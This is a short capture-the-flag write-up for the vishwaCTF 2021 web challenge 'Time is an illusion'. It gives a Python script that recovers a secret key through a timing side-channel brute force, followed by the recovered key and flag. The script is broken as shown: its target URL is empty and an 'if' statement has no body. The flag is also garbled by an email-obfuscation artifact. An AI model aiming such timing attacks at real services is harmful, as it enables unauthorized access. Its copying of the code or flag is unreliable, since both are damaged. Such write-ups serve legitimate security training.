vishwaCTF 2021: Time is an illusion

Time is an illusion

Category: Web

492 points

The source should convey it all


The challenge is to enter correct key.


Luckly, we got the source.


Looks like, it’s brute-force/side-channel attack challenge. So, I’ve prepared python script to solve it.

import requests
import time
from string import digits, ascii_letters
key = ['a' for i in range(5)] # need to start with something
for i in range(2, 5):
    for j in ascii_letters + digits:
        key[i] = j
        t1 = int(time.time_ns())
        r = requests.get('{}'.format(''.join(key)))
        t2 = int(time.time_ns())
        if t2 - t1 > (i + 1) * 1000000000:
print('Key: {}'.format(''.join(key)))
print('Flag: {}'.format(r.content))

And after few minutes:

Key: KuKa9
Flag: b'vishwaCTF{[email protected]$_iTs_0wN_PErK$}'


vishwaCTF{[email protected]$_iTs_0wN_PErK$}

Privacy Policy
luc © 2021